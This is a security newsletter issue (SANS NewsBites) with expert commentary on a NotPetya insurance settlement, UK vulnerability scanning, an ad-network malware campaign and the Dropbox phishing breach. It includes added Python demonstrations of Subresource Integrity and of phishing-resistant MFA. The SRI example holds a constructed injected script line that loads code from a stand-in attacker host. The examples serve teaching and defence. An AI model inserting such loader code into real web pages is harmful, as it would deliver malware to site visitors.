SANS NewsBites

Five Years of Legal Action Gain Food Company a Cyberinsurance Settlement on NotPetya Claim; UK Intelligence Agency Proposes Scanning All UK Systems for Vulnerabilities; Check to Make Sure Advertising Networks Aren’t Attacking Your Customers From Your Sites

November 4, 2022  |  Volume XXIV - Issue #86

Top of the News


2022-11-02

Mondelez, Zurich American Insurance Company Settle Claim Lawsuit Over NotPetya Infection

Mondelez International has settled a lawsuit it brought against the Zurich American Insurance Company over the insurer’s refusal to pay a $100 million claim for a cyberattack. Mondelez’s IT systems were infected with the NotPetya malware in 2017. The company says it incurred costs in excess of $100 million due to damaged hardware and operational software systems, supply and distribution disruptions, and other losses.

Editor's Note

As usual, the cost of avoiding this incident was likely much lower than the costs Mondelez incurred – even after achieving this settlement with their insurer. No details on how much Zurich paid Mondelez in the settlement, but most likely less than $100M. Plus Mondelez paid the insurance premiums with a deductible, and for 5 years of legal costs. The biggest impact to their bottom line is not those costs - in 2020, Mondelez had over $25B in revenue/turnover and almost $5B in profit. The biggest impact to profit was that they failed to protect their customers from being impacted.

John Pescatore

You may not have heard of Mondelez, but you know their brands: Oreo Cookies, Sour Patch Kids candy, Ritz Crackers, etc. One of the topics being debated is whether this is an act of war (aka nation state attack), which would then invalidate the insurance claim. While the policy appeared to cover much of the damage incurred, the insurer was focused on NotPetya being Russian APT in origin (originally used against Ukraine by the Sandworm APT), and therefore a nation state attack; what is not clear is if the collateral damage was also the actions of the APT. With efforts to tighten up insurance language, make sure that you not only tabletop this type of scenario, but also have engaged legal counsel to carefully review your most current policy and be prepared to defend your case. Include contingencies for an extended settlement timeframe, which you hopefully won't need.

Lee Neely

We will likely never know the terms of the settlement, but suffice it to say, adherence to essential cyber hygiene practices would have limited the costs of cleanup and recovery for Mondelez. Insurers, over the past 24 months, have moved to require basic cybersecurity practices and evidence of such practices before establishing a cybersecurity policy. It remains to be seen whether the war exclusion clause, under which Zurich denied the claim, will continue to be included in future cybersecurity policies.

Curtis Dukes

Poorly written insurance contracts create what the insurance industry calls a “moral hazard;” they invite people to assign to underwriters risk that, in the absence of such contracts, would be cheaper to mitigate.

William Hugh Murray

2022-11-03

UK’s NCSC Will Scan Country’s Systems for Known Vulnerabilities

The UK’s National Cyber Security Centre (NCSC) plans to scan all Internet-connected systems hosted in the country for known vulnerabilities. In a blog post, NCSC Technical Director Ian Levy says the effort will be transparent, that NCSC will “publicly explain the purpose and scope of the scanning system, mark activity so that it can be traced back to the scanning system being used, audit scanning activity so abuse reports can be easily and confidently assessed, minimise scanning activity to reduce impact on target resources, and ensure opt-out requests are simple to send and processed quickly.”

Editor's Note

This points out part of the problem of intelligence agencies having responsibility for cyber defense, as well. The goals of intelligence agencies don’t always align with the rapid closing of vulnerabilities and even if the goals do align, history makes it harder to believe it is so. Seems like funding a third party to do the scanning and only provide NCSC with the aggregate data to meet their stated goals would be an alternative.

John Pescatore

While I applaud NCSC’s efforts, there are already a number of cybersecurity risk rating platforms that exist in the marketplace today. In fact, they also include capabilities to evaluate third party trust. Perhaps teaming with one or more of those vendors can achieve greater measurement of cybersecurity for UK based organizations.

Curtis Dukes

This is a double-edged sword. It is truly awesome to have another set of eyes cross checking for things you miss, but can be a true nuisance as you train them on accepted risks and minimizing disruptions caused by the scans. Do not use this as an excuse to not conduct your own scans. You want to be the one discovering issues on your systems. If faced with this scenario, make sure that you have clear information on contacts, scan schedules and intensity, then verify your team is detecting the activity. Make sure you have actively assigned response, remediation and tracking responsibilities.

Lee Neely

This actually sounds like a great idea. At the scale of the UK, this might be an effective campaign that finds and begins treatment of the worst vulnerabilities. And as the federal government, they should have the ability to find device owners and contact them credibly.

Christopher Elgee

Those who are proposing this program seem to have given a lot of thought to the unintended consequences. Surely the rogue hackers are scanning for your vulnerabilities. Rather than caution you about them, they will use them against you. Here, rather than have the state do the scanning, I would like to see the ISPs do it. While this may involve changes to their terms and conditions, they can promote it as a feature.

William Hugh Murray

2022-11-03

Scores of US News Sites are Delivering Malware


Numerous news sites across the US are serving up malware, according to Proofpoint Threat Research. The issue appears to be a supply chain attack: the attackers compromised a content and advertising engine that delivers videos and advertising via JavaScript to the more than 250 affected news sites, so every page loading that script picked up the injected code.

Editor's Note

This is very similar to an incident in January that affected realtor websites. A video delivery platform was compromised, which affected multiple sites using the service. If applicable, the simplest solution is SRI (Subresource Integrity), which adds hashes to script tags retrieving remote content. But often the "business need" to track users interferes, as it requires the JavaScript to change for each user, reducing the applicability of SRI hashes.

Johannes Ullrich
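
The SRI mechanism mentioned in the note above, as an added worked example (not code from the newsletter, from Proofpoint, or from any of the affected sites): it computes the integrity token for a vendor script, emits the tag a site would publish, simulates the browser-side check against a tampered copy, and shows why a script that changes per visitor cannot be pinned. The vendor URL, the script bodies and the per-user tracking snippet are all constructed for the illustration.

```python
import base64
import hashlib
import re
from html import escape

# Constructed sample: the vendor script a news site would load from a third-party CDN.
# The URL is hypothetical.
VENDOR_URL = "https://cdn.video-vendor.example/player.js"
VENDOR_JS = b"window.player = { play: function () { console.log('playing'); } };\n"

# Constructed: the same file after an attacker appends a loader for a second-stage
# script, the shape of injection a compromised delivery platform would serve.
INJECTED_JS = VENDOR_JS + (
    b"var s = document.createElement('script');"
    b"s.src = 'https://attacker.example/update.js'; document.head.appendChild(s);\n"
)


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the SRI integrity token for content: "<algo>-<base64 of the raw digest>"."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI only permits sha256, sha384 and sha512")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Build the <script> tag a site publishes once it has reviewed one version of the script.

    crossorigin="anonymous" is required for cross-origin SRI: without CORS the browser cannot
    read the response bytes to hash them and refuses to execute the script at all.
    """
    return (f'<script src="{escape(src, quote=True)}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def browser_would_execute(tag: str, fetched: bytes) -> bool:
    """Simulate the browser-side check: the script runs only if a listed token matches the bytes.

    Simplified: a real browser considers only the strongest algorithm listed; here any match
    passes, which is how a site lists two hashes to cover a staged vendor rollout. A tag with
    no integrity attribute pins nothing, so the script runs whatever was served.
    """
    m = re.search(r'integrity="([^"]*)"', tag)
    if not m:
        return True
    for token in m.group(1).split():
        algo, _, _ = token.partition("-")
        if algo in ("sha256", "sha384", "sha512") and sri_hash(fetched, algo) == token:
            return True
    return False


def per_user_script(user_id: str) -> bytes:
    """Constructed tracking snippet that embeds a per-visitor identifier, so every response differs."""
    return b"window.trackingId = '" + user_id.encode() + b"';\n" + VENDOR_JS


def demo() -> dict:
    tag = script_tag(VENDOR_URL, VENDOR_JS)
    return {
        "tag": tag,
        "clean_runs": browser_would_execute(tag, VENDOR_JS),       # reviewed version: runs
        "injected_runs": browser_would_execute(tag, INJECTED_JS),  # tampered version: blocked
        # The hash published for one visitor never matches the bytes served to the next,
        # which is the tracking-versus-SRI conflict the note describes.
        "per_user_pinnable": sri_hash(per_user_script("u1")) == sri_hash(per_user_script("u2")),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The operational consequence is that SRI only works when the site controls which version of the vendor script is acceptable: every legitimate vendor release requires republishing the tag with the new hash, which is exactly the review step a compromised delivery platform would have to get past.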

Those ads are obviously a source of revenue for the company sites showing them, so the cost of making sure that they are safe and secure should be built into the business decisions to go after advertising revenue – but obviously that is too often not the case. If your company is hosting ads from third party services, this is a good one to use as part of briefing the management and the board.

John Pescatore

So what do you do if your trusted site for media and content is itself compromised? Scanning _YOUR_ content won't reveal that: you have to look at things from an end-user POV and be prepared to disconnect the inappropriate feed as well as aggressively scan for discovered IOCs. Proofpoint is tracking this attack to an APT they call TA569, which is distributing the SocGholish (aka FakeUpdates) malware, which can lead to follow-up issues, including ransomware. TA569 is also adept at re-infecting remediated services, which means you need to be on your toes if you discover SocGholish.

Lee Neely

Unfortunately most news outlets are 100% dependent upon ad revenue. Some of their "advertisers" are bound to be malicious, and that's just the water these agencies have to fish in.

Christopher Elgee

The Rest of the Week's News


2022-11-03

Red Cross Wants a Digital Emblem to Protect Systems from Cyberattacks

The International Committee of the Red Cross (ICRC) is seeking support for a digital emblem that would identify its systems as off-limits from cyberattacks. For such an emblem to take effect, states would need to agree on how it will be used and codify it as part of International Humanitarian Law. The ICRC has proposed three possible solutions: a DNS-based emblem, an IP-based emblem, and an Authenticated Digital Emblem that uses certificate chains.

Editor's Note

Reminds me of the "Do Not Track" header browsers experimented with, or the "Do Not Hack" header I am adding as a bit of a joke to my web servers. Maybe the Red Cross should resurrect its "redcross.int" domain again and use it for sites it attempts to protect.

Johannes Ullrich

My first response was to scoff, but one hundred and fifty years ago, it probably took many years for the Geneva Convention to recognize the Red Cross to protect medical workers on battlefields. There have been many incidents of that convention being violated, but respecting it largely has become part of the “norms” of physical battle. The difference these days is that it will quickly be used in phishing campaigns, and verification methods will be ignored.

John Pescatore

The comparison to kinetic warfare, equating the digital emblem to a red-cross uniform, while an accurate analogy, may not be sufficient to deter attackers unless there is sufficient international law to support consequences which vastly outweigh the appeal of the attack. Even after that is in place, you still need to be prepared for an attack. Don't be the one not wearing Kevlar. Enable all the protections for services and devices you already own, make sure that you have a standard to set the minimum level of protections as well as how to incorporate these into your overall incident prevention and response capabilities, whether insourced or outsourced. Now review these regularly to make sure they are both functional and relevant.

Lee Neely

Institutions like the Red Cross/Red Crescent should be declared off-limits from cyberattacks. While not a digital emblem, a plea was made to ransomware purveyors not to attack hospitals and care centers during the onset of the COVID pandemic. That lasted about a week. It’s likely that nation states would abide by the intent of the digital emblem; cyber criminals, however, have different motives.

Curtis Dukes

So, a little while back, some of the major ransomware gangs promised they'd stop attacking hospitals, and here we are. I'm not saying it's foolish for the Red Cross to ask for such a thing, and it'd be fantastic if it worked, but count me skeptical.

Christopher Elgee

2022-11-02

Dropbox: We Were Targeted in a Phishing Campaign

Dropbox has disclosed that a phishing campaign in October gave attackers access to some of its GitHub repositories. GitHub alerted Dropbox to suspicious activity; when Dropbox investigated, it learned that the attackers had copied 130 code repositories. The incident is noteworthy because the attackers were able to get past multi-factor authentication.

Editor's Note

Looks like this was a phishing attack that took advantage of vulnerabilities in CircleCI’s (a widely used continuous integration platform) implementation of MFA. Like all security controls, if you implement them badly they don’t keep the bad guys out. Part of supply chain security is making sure vendors are showing evidence of having their software tested for vulnerabilities or open attack paths.

John Pescatore

The Dropbox blog provides not only an explanation of how, even with multiple layers of defense, the attackers were able to get access, but also an assessment of their MFA solution at the time. As convenient as OTP/TOTP and SMS are for MFA, current attack techniques include processes for leveraging their shortfalls. Use the analysis to support your case to move to phishing resistant MFA.

Lee Neely
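
The difference between OTP/TOTP and phishing-resistant MFA that the two notes above turn on, as an added simulation (not code from the newsletter, from Dropbox, GitHub or CircleCI, and not a description of what happened in the Dropbox incident): the same attacker-in-the-middle relay is run against a TOTP login and against an origin-bound WebAuthn-style login. The TOTP routine is the real RFC 6238 algorithm; the WebAuthn part is deliberately simplified (an HMAC stands in for the authenticator's asymmetric signature, and the signed data is just challenge plus origin), and the secrets, origins, password and fixed clock are all constructed.

```python
import hashlib
import hmac
import struct

# Constructed secrets. TOTP_SECRET is what the user's authenticator app and the real site
# share; DEVICE_KEY stands in for the private key inside a FIDO2/WebAuthn authenticator
# (a real one signs with an asymmetric key; an HMAC keeps this illustration short).
TOTP_SECRET = b"constructed-totp-seed"
DEVICE_KEY = b"constructed-authenticator-key"

REAL_ORIGIN = "https://login.example.com"            # hypothetical legitimate origin
PHISH_ORIGIN = "https://login.example-account.net"   # hypothetical lookalike origin
PASSWORD = "correct horse battery staple"            # constructed victim password
NOW = 1_700_000_000                                  # fixed clock so the run is reproducible


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the time-step counter, dynamically truncated (RFC 4226)."""
    counter = struct.pack(">Q", at // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"


class RealSite:
    """The genuine service, offering both login methods."""

    def login_with_totp(self, password: str, code: str, at: int) -> bool:
        # The site can only check that the code is right for the current step; it cannot
        # tell whether the user typed it here or into a lookalike page seconds earlier.
        return password == PASSWORD and hmac.compare_digest(code, totp(TOTP_SECRET, at))

    def webauthn_challenge(self) -> bytes:
        return b"constructed-random-challenge"  # a real server draws this fresh per login

    def login_with_webauthn(self, challenge: bytes, signature: bytes) -> bool:
        # The server reconstructs what a genuine authenticator must have signed: the
        # challenge bound to the server's own origin. A signature over any other origin
        # cannot match, however promptly it is relayed.
        expected = hmac.new(DEVICE_KEY, challenge + REAL_ORIGIN.encode(), hashlib.sha256).digest()
        return hmac.compare_digest(expected, signature)


def authenticator_sign(challenge: bytes, origin_seen_by_browser: str) -> bytes:
    """The browser, not the page, reports the origin of the requesting site, and it gets signed."""
    return hmac.new(DEVICE_KEY, challenge + origin_seen_by_browser.encode(), hashlib.sha256).digest()


def phish_totp(site: RealSite, at: int = NOW) -> bool:
    """Attacker-in-the-middle: the victim types password and current code into the lookalike
    page; the attacker replays both to the real site within the same 30-second step."""
    captured_password, captured_code = PASSWORD, totp(TOTP_SECRET, at)
    return site.login_with_totp(captured_password, captured_code, at + 5)


def phish_webauthn(site: RealSite) -> bool:
    """Same relay against WebAuthn: the attacker forwards the real challenge to the victim's
    browser, but that browser is on the phishing origin, so that origin is what gets signed."""
    challenge = site.webauthn_challenge()
    signature = authenticator_sign(challenge, PHISH_ORIGIN)
    return site.login_with_webauthn(challenge, signature)


def genuine_webauthn(site: RealSite) -> bool:
    challenge = site.webauthn_challenge()
    return site.login_with_webauthn(challenge, authenticator_sign(challenge, REAL_ORIGIN))


if __name__ == "__main__":
    site = RealSite()
    print("TOTP relayed by phishing page accepted:", phish_totp(site))
    print("WebAuthn relayed by phishing page accepted:", phish_webauthn(site))
    print("WebAuthn from the real origin accepted:", genuine_webauthn(site))
```

The point the simulation isolates is that a TOTP code carries no information about where it was typed, so the only defense is the 30-second window, which a live relay beats trivially; an origin-bound assertion fails on the phishing site no matter how fast the relay is, because the user's browser will never put the real origin into what the authenticator signs.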

2022-11-03

Charges Filed in Vastaamo Data Breach Case

Finnish police have charged one individual for his alleged role in a data breach that exposed sensitive personal information of patients receiving mental health treatment from the Vastaamo Psychotherapy Center. When Vastaamo refused to pay a ransom for the stolen information in 2020, the thief began attempting to extort payment from the patients. Julius “Zeekill” Kivimaki was charged and “arrested in absentia.”

Editor's Note

An interesting twist on a standard ransomware attack—eliciting payment from individuals whose patient records were exposed during the cyber breach. Two points to make: 1) Even attackers make mistakes. In this case, poor OPSEC practices led police investigators to identify the perpetrator. 2) Every business has a responsibility for establishing basic cyber hygiene practices. That includes ensuring administrator accounts are password protected and audit logs are routinely monitored for signs of cyberattack.

Curtis Dukes

The big break came when Kivimaki published data from the breach which included his home folder, SSH keys, known-hosts and other big clues to who he was. While the Finns don't typically reveal this level of detail about suspects, the information revealed is strengthening cases for him to be imprisoned indefinitely. Vastaamo, while groundbreaking in enabling mental health services which were mostly covered by insurance with more than tolerable wait times, was dependent on a MySQL database which was Internet accessible with a blank Administrator password. Make sure that your security scanning is looking for this type of scenario, and that you are performing application security scans on a regular basis.

Lee Neely

2022-11-02

US Treasury Thwarted DDoS Attack

In October, the US Treasury fended off a distributed denial-of-service (DDoS) attack, according to Todd Conklin, cybersecurity counselor to Deputy Treasury Secretary Wally Adeyemo. Conklin said the attack targeted the agency’s critical infrastructure nodes. The attack has been attributed to a hacking group with ties to Russia.

Editor's Note

Better to be able to report a thwarted attack than to fall victim to one. After you have enabled DDoS protections both at your perimeter and at your cloud-based services, make sure that you are getting reports on their effectiveness: you may find it eye-opening. If possible, make sure that you're reporting these types of attacks to the FBI, CISA, etc. so they can be incorporated in larger response efforts.

Lee Neely

Don’t forget to periodically test any DDoS response triggered switchovers!

John Pescatore

2022-11-03

Chile’s ALMA Observatory Suspends Operations Due to Cyberattack

Chile’s Atacama Large Millimeter Array (ALMA) Observatory has suspended all astronomical observation operations and taken down its website following a cyberattack over the weekend. The observatory says that the attack did not affect antennas or any scientific data, and that they are “still working hard on the full recovery of services.”

Editor's Note

This breach shows that no organization is immune to cyberattack. What’s strange is the wording that the observatory’s antennas and scientific data were not affected. Ok, but then what was the purpose of the attack? Ransomware, evidently not. Control of the operational technology, no. There will be more to this story.

Curtis Dukes

2022-11-02

Microsoft Fixes Vulnerability in Jupyter Notebooks for Azure Cosmos DB

Microsoft has fixed an authentication bypass vulnerability in Jupyter Notebooks for Azure Cosmos DB. Microsoft says the flaw, a missing authentication check, was introduced in August. Researchers from Orca reported it to Microsoft in early October; Microsoft fixed the issue two days later.

Editor's Note

While the flaw was specific to Jupyter Notebooks for Azure Cosmos DB (99.8% of Azure Cosmos DB users are not in this category), and exploiting the flaw required guessing the 128-bit random GUID of an active session, aka "forwardingID" - which had to be used within an hour, Microsoft still patched the flaw by adding increased authentication checks. Since this is a server-side fix, no user action is necessary. Exploiting the flaw allowed full access to the Notebook.

Lee Neely

Internet Storm Center Tech Corner

Breakpoints in Burp

https://isc.sans.edu/forums/diary/Breakpoints%20in%20Burp/29214/

Who Put the "Dark" in DarkVNC?

https://isc.sans.edu/forums/diary/Who+put+the+Dark+in+DarkVNC/29210

OpenSSL 3.0 Punycode Vulnerability Fix

https://isc.sans.edu/forums/diary/Critical+OpenSSL+30+Update+Released+Patches+CVE20223786+CVE20223602/29208

https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/

TA569 Supply Chain Attack Injects JavaScript

https://twitter.com/threatinsight/status/1587865920130752515

https://www.darkreading.com/application-security/supply-chain-attack-pushes-out-malware-to-more-than-250-media-websites

Link to old story similar to the above JavaScript injection

https://unit42.paloaltonetworks.com/web-skimmer-video-distribution/

Hitachi Infrastructure Analytics Advisor

https://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2022-134/index.html

Fortinet Patches

https://fortiguard.fortinet.com/psirt?date=11-2022

Nessus Patches

https://www.tenable.com/security/tns-2022-24

sigstore General Availability

https://openssf.org/press-release/2022/10/25/sigstore-announces-general-availability-at-sigstorecon/

https://github.blog/2022-10-25-why-were-excited-about-the-sigstore-general-availability/

URLScan.io's SOAR Spot: Chatty Security Tools Leaking Private Data

https://positive.security/blog/urlscan-data-leaks

Checkmk: Remote Code Execution by Chaining Multiple Bugs

https://blog.sonarsource.com/checkmk-rce-chain-1/